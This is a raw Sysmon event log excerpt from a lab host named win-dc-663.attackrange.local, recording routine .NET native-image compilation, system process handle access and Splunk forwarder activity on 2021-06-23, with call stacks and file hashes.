21:03:47.596{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B3-60D3-5C03-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.503{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18EB0E5FC62812AFAE2C52330577968D,SHA256=30F444C87AE5F6B98834B90CECC960657169B0A25A857630D63AF7D877B752F3,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000020265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.487{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B3-60D3-5B03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.456{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B3-60D3-5B03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:51.581{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B7-60D3-6C03-00000000CF01}2928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.565{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B7-60D3-6C03-00000000CF01}2928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:51.565{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B7-60D3-6C03-00000000CF01}2928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:51.440{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B7-60D3-6B03-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.424{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1B7-60D3-6B03-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:51.424{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B7-60D3-6B03-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:51.393{4DB9351A-A1B7-60D3-6A03-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11d4-0\Microsoft.GroupPolicy.Interop.dll2021-06-23 21:03:51.393 10341000x800000000000000020335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:51.284{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B7-60D3-6A03-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.268{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B7-60D3-6A03-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:51.268{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B7-60D3-6A03-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:51.159{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B7-60D3-6903-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:51.143{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B7-60D3-6903-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:51.143{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B7-60D3-6903-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:51.112{4DB9351A-A1B6-60D3-6803-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bb8-0\Microsoft.GroupPolicy.AdmTmplEditor.dll2021-06-23 21:03:51.112 23542300x800000000000000020345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:52.971{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ADD10C15F39128D215FF53CB4E14F75,SHA256=BEFD067C23EE3648D7465B1681847089235FA835A03C7C187DBB96C61AED853A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1B9-60D3-7003-00000000CF01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:53.971{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:53.971{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B9-60D3-7003-00000000CF01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.971{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1B9-60D3-7003-00000000CF01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.972{4DB9351A-A1B9-60D3-7003-00000000CF01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000020361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.538{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 